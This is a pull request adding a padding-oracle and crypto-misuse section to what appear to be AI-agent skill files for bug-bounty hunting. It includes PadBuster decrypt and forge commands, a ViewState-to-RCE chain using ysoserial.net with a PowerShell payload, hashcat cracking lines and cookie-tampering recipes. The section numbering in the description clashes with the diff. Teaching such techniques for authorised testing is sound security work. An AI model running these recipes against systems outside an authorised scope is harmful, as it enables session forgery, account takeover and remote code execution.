### PR TITLE
feat(vuln-classes): add padding oracle and crypto misuse coverage

### DIFF
--- a/skills/security-arsenal/SKILL.md
+++ b/skills/security-arsenal/SKILL.md
@@ -273,6 +273,8 @@ token = f"{header}.{payload}."
 hashcat -a 0 -m 16500 jwt.txt ~/wordlists/rockyou.txt
 ```
 
+> **Non-JWT encrypted session cookies / ViewState / opaque auth blobs?** If decoded length is a multiple of 8 or 16 and a 1-byte flip returns HTTP 500, test for CBC padding oracle — see web2-vuln-classes **Padding Oracle & Crypto Misuse** for PadBuster recipe and ViewState-to-RCE chain.
+
 ### OAuth Attacks
 ```bash
 # Missing PKCE test

--- a/skills/web2-recon/SKILL.md
+++ b/skills/web2-recon/SKILL.md
@@ -282,7 +282,7 @@ curl -sI https://target.com | grep -iE "server|x-powered-by|x-aspnet|x-runtime|x
 | Laravel | Mass assignment ($fillable) | IDOR (Eloquent, no ownership) |
 | Express (Node.js) | Prototype pollution | Path traversal + debug surface (`/_debug`, `/__debug__`) → web2-vuln-classes "Error Disclosure / Debug Endpoints" |
 | Spring Boot | Actuator endpoints → web2-vuln-classes "Error Disclosure / Debug Endpoints" for full surface | SSTI (Thymeleaf) |
-| ASP.NET | ViewState deserialization | Open redirect (ReturnUrl) |
+| ASP.NET | ViewState deserialization (if encrypted, also test padding-oracle path → web2-vuln-classes **Padding Oracle & Crypto Misuse**) | Open redirect (ReturnUrl) |
 | Next.js | SSRF via Server Actions + `/_next/data/` / `/_next/static/chunks/` → web2-vuln-classes "Error Disclosure / Debug Endpoints" | Open redirect via redirect() |
 | GraphQL | Introspection → auth bypass on mutations | IDOR via node(id:) |
 | WordPress | Plugin SQLi | REST API auth bypass |

--- a/skills/web2-vuln-classes/SKILL.md
+++ b/skills/web2-vuln-classes/SKILL.md
@@ -1,9 +1,9 @@
 ---
 name: web2-vuln-classes
-description: Complete reference for 22 web2 bug classes with root causes, detection patterns, bypass tables, exploit techniques, and real paid examples. Covers IDOR, auth bypass, XSS, SSRF (11 IP bypass techniques), SQLi, business logic, race conditions, OAuth/OIDC, file upload (10 bypass techniques), GraphQL, LLM/AI (ASI01-ASI10 agentic framework), API misconfig (mass assignment, JWT attacks, prototype pollution, CORS), ATO taxonomy (9 paths), SSTI (Jinja2/Twig/Freemarker/ERB/Spring), subdomain takeover, cloud/infra misconfigs, HTTP smuggling (CL.TE/TE.CL/H2.CL), cache poisoning, MFA bypass (7 patterns), SAML attacks (XSW/comment injection/signature stripping), error disclosure / debug endpoints (stack trace regex per framework, chain templates), CSS injection (attribute-selector exfiltration, opacity clickjacking, @import). Use when hunting a specific vuln class or studying what makes bugs pay.
+description: Complete reference for 23 web2 bug classes with root causes, detection patterns, bypass tables, exploit techniques, and real paid examples. Covers IDOR, auth bypass, XSS, SSRF (11 IP bypass techniques), SQLi, business logic, race conditions, OAuth/OIDC, file upload (10 bypass techniques), GraphQL, LLM/AI (ASI01-ASI10 agentic framework), API misconfig (mass assignment, JWT attacks, prototype pollution, CORS), ATO taxonomy (9 paths), SSTI (Jinja2/Twig/Freemarker/ERB/Spring), subdomain takeover, cloud/infra misconfigs, HTTP smuggling (CL.TE/TE.CL/H2.CL), cache poisoning, MFA bypass (7 patterns), SAML attacks (XSW/comment injection/signature stripping), error disclosure / debug endpoints (stack trace regex per framework, chain templates), CSS injection (attribute-selector exfiltration, opacity clickjacking, @import), padding oracle / crypto misuse (CBC decrypt+forge, ViewState RCE, ECB block-repetition, weak-hash quick-wins). Use when hunting a specific vuln class or studying what makes bugs pay.
 ---
 
-# WEB2 BUG CLASSES — 22 Classes
+# WEB2 BUG CLASSES — 23 Classes
 
 Root cause, pattern, bypass table, chaining opportunity, real paid examples.
 
@@ -1091,4 +1091,110 @@ Opacity overlay + completes a sensitive action in PoC                  = Medium/
 Only cosmetic CSS allowed (no url()/@import) + no exfil path           = N/A
 url() blocked but transforms/positioning allowed                       = Info (clickjacking-only chain)
 HTML email CSS rendering with rendered attacker styles                 = Medium (case-by-case)
+```
+
+---
+
+## 23. PADDING ORACLE & CRYPTO MISUSE
+> Apps encrypt session data, settings, or state into cookies / hidden fields / URL params to make them tamper-proof. When the **decryption** path leaks whether padding is valid (via differential responses), an attacker without the key can decrypt **and forge** arbitrary plaintexts. ASP.NET ViewState, Rails session cookies, and home-grown CBC-encrypted cookies remain common targets. Also covers ECB block-repetition and weak-hash quick-wins.
+
+### Identifying Padding Oracle Candidates
+| Signal | What it means |
+|---|---|
+| Cookie / token is base64 or hex, decoded length is multiple of 8 or 16 | CBC mode candidate |
+| `__VIEWSTATE` hidden field in form | ASP.NET — classic padding-oracle / ViewState-forgery target |
+| Rails <= 4.0 `_app_session` cookie not signed-then-encrypted | Padding oracle candidate (CVE-2013-0156 lineage) |
+| Java JEE `JSESSIONID` longer than usual (>64 chars base64) | Some app servers encrypt session — test for oracle |
+| Custom `auth=...`, `state=...`, `data=...` opaque blobs | Always worth probing |
+
+### Response-Signal Triangulation (1-byte flip test)
+Flip the last byte of the ciphertext and watch response:
+
+```
+500 Internal Server Error  =  STRONG signal — app leaks padding error directly
+401/403 + different body length than normal "wrong creds"  =  Possible — diff-based oracle
+200 + same body  =  Not exploitable (or oracle is timing-based, much slower attack)
+```
+
+### Mechanics (one-paragraph version)
+CBC decryption: `plaintext_block_n = decrypt(ciphertext_block_n) XOR ciphertext_block_{n-1}`. By **mutating block_{n-1}** one byte at a time and observing whether padding validates on `block_n`, an attacker recovers `decrypt(block_n)` byte-by-byte (256 tries per byte; 16 bytes per block = ~4096 requests). Same primitive lets you **forge** any plaintext: given known mapping for one block, compute the ciphertext that decrypts to your target.
+
+### PadBuster — Decrypt and Forge
+
+```bash
+# Install
+gem install padbuster
+# or: git clone https://github.com/AonCyberLabs/PadBuster && cd PadBuster
+
+# DECRYPT mode — recover plaintext of a cookie
+padbuster https://target.com/page CIPHERTEXT 16 \
+  --cookies "auth=CIPHERTEXT" \
+  --encoding 0    # 0=base64, 1=lower hex, 2=upper hex, 3=base64+url-safe
+
+# ENCRYPT mode — forge ciphertext for a chosen plaintext
+padbuster https://target.com/page CIPHERTEXT 16 \
+  --cookies "auth=CIPHERTEXT" \
+  --plaintext "user=admin&role=root"
+```
+
+Switches that matter when the oracle is noisy:
+- `-error "Internal Server Error"` — explicit signature string for "bad padding"
+- `--prefix "known_block"` — if you know a leading plaintext block, anchor against it
+- `--no-iv` — when IV is part of the cookie (some implementations strip it)
+
+### ASP.NET ViewState — Padding Oracle to RCE Chain (CVE-2010-3332 lineage)
+The crown-jewel target. If `__VIEWSTATE` validation/decryption is CBC and leaks padding errors, the chain is:
+
+```
+1. Capture __VIEWSTATE from any page (form hidden field, view-source)
+2. Run PadBuster against the page that processes the postback -> recover machineKey-equivalent oracle
+3. Use ysoserial.net to build a ViewState payload that triggers .NET deserialization gadget:
+     ysoserial.exe -p ViewState -g TextFormattingRunProperties \
+       -c "powershell ..." --decrypt KEY --validationkey KEY \
+       --validationalg HMACSHA256 --decryptionalg AES
+4. Submit forged __VIEWSTATE in POST -> RCE under app pool identity
+```
+
+Cheaper variant when machineKey is leaked elsewhere (web.config exposure via path traversal, `/elmah.axd`, `/trace.axd`, `.git/` exposure): skip PadBuster, jump straight to ysoserial.net.
+
+### Bonus — Weak Crypto Quick Wins (no padding oracle needed)
+
+```
+ECB mode detection
+  Encrypt repeated plaintext: AAAAAAAAAAAAAAAAAAAAAAAAAAAA (32 A's, two 16-byte blocks)
+  If ciphertext blocks are IDENTICAL bytes -> ECB confirmed -> block-swap / replay attacks viable
+
+Weak password hash
+  hashid <hash>  ->  identifies algorithm (MD5/SHA1/bcrypt/etc.)
+  MD5/SHA1 unsalted + leaked user table -> crackstation.net / hashcat -m 0 / -m 100
+
+"Base64 as encryption"
+  Cookie that decodes via base64 to readable JSON / key=value pairs = no actual encryption
+  Modify the plaintext, re-encode, submit -> privilege change with zero cryptanalysis
+
+Static IV / Reused nonce (CBC or GCM)
+  Two ciphertexts of equal length with byte-identical leading blocks -> likely static IV
+  Allows known-plaintext attacks and bit-flipping on the first block
+```
+
+### Chains That Pay
+```
+Padding oracle on session cookie -> decrypt -> forge admin cookie               Critical (ATO)
+ViewState padding oracle -> ysoserial.net deserialization gadget -> RCE         Critical
+Padding oracle on opaque state param -> tampered state survives integrity check Medium/High
+ECB block-swap on encrypted cookie -> role escalation                           High
+Weak hash + small user table leak -> password recovery                          High
+"Base64 as encryption" cookie -> tamper plaintext -> privilege change           High
+Padding oracle confirmed, no forge path applicable (read-only data)             Medium (info disclosure)
+Padding oracle suspected but only timing differential (no status/length diff)   Low/Info (chain only)
+```
+
+### Triage
+```
+1-byte flip on cookie -> 500, PadBuster confirms decryption/forge end-to-end    Critical
+ViewState padding oracle + ysoserial RCE PoC                                    Critical
+ECB block repetition detected + structured data + working swap attack           High
+Weak hash + actual password recovery in PoC                                     High
+"Base64 as encryption" + working privilege change PoC                           High
+Crypto oracle suspected but no working tamper/decrypt PoC                       N/A (chain only)
 ```


### PR DESCRIPTION
## What this adds

A new section in `web2-vuln-classes/SKILL.md` covering **CBC padding oracle, ViewState forgery, and weak-crypto quick-wins** — a bug class the plugin's existing 20 sections do not cover.

Padding oracle has been a stable bounty earner for over a decade (\$2K–\$5K floor, Critical when chained to ViewState RCE). The plugin currently has no detection signals, no PadBuster recipe, and no chain template — so when the AI encounters an opaque encrypted cookie or `__VIEWSTATE` field during `/hunt`, it has nothing to anchor on.

### Section contents
- **Candidate identification table** — CBC indicators across cookies, `__VIEWSTATE`, Rails `_app_session` (CVE-2013-0156 lineage), Java JEE `JSESSIONID`, custom opaque blobs
- **Response-signal triangulation** — 1-byte ciphertext flip → HTTP 500 = strong signal, 401/403 length-diff = possible, 200 same body = not exploitable
- **Mechanics paragraph** — explains why 256 tries per byte recovers plaintext, so the AI can articulate WHY the attack works rather than just running PadBuster blindly
- **PadBuster recipe** — decrypt and forge (encrypt) modes, with switches that matter when the oracle is noisy (`-error`, `--prefix`, `--no-iv`)
- **ASP.NET ViewState → RCE chain** (CVE-2010-3332 lineage) with explicit `ysoserial.net` invocation and the machineKey-leak shortcut
- **Bonus weak-crypto quick-wins** that don't need padding oracle: ECB block-repetition detection (encrypt 32 A's, look for repeated 16-byte blocks), MD5/SHA1 unsalted hash recovery via hashid + hashcat, "base64 as encryption" tells, static IV / reused nonce
- **Chains That Pay** (8 rows) and **Triage** (6 rows) in the same shape as the existing always-rejected / conditionally-valid tables

### Workflow hooks
Cross-references at two decision points so the new content actually fires:

| File | Where | What |
|---|---|---|
| `web2-recon` stack→bug class table | ASP.NET row | Now points to section 21 for the padding-oracle path when ViewState is encrypted |
| `security-arsenal` AUTHENTICATION BYPASS | Between JWT Attacks and OAuth Attacks | Pointer telling the AI to test CBC padding oracle on non-JWT encrypted cookies / opaque auth blobs when a 1-byte flip returns 500 |

### Why this matters
The crown-jewel chain — `__VIEWSTATE` padding oracle → ysoserial.net deserialization → RCE — is the kind of finding that Microsoft has paid five-figure bounties for. The plugin's existing material covers neither the detection (no 500-on-flip mention anywhere) nor the exploitation (no PadBuster recipe, no ysoserial.net reference). This PR fills both gaps.

The "base64 as encryption" check alone is worth keeping in mind — every few months a vendor ships a cookie that base64-decodes to a JSON role/permission blob with no MAC, and the AI today would not flag this as a finding because it doesn't have the heuristic.

### Non-changes
- No new commands
- No new skills
- No new tool scripts
- No external dependencies

### File-level changes
- `skills/web2-vuln-classes/SKILL.md` — +107 lines / -2 lines (new section 21 + header count fix + frontmatter description extension)
- `skills/security-arsenal/SKILL.md` — +2 lines (pointer in AUTHENTICATION BYPASS section)
- `skills/web2-recon/SKILL.md` — 1 row extended in stack-bug-class table

### Notes on parallel PRs
This PR, #47 (error disclosure / debug endpoints), and #50 (CSS injection) all branched off the same upstream/main state and each numbers its new section as "Section 21". Whichever merges first, the others will need a quick rebase to renumber. Happy to handle the rebase on request.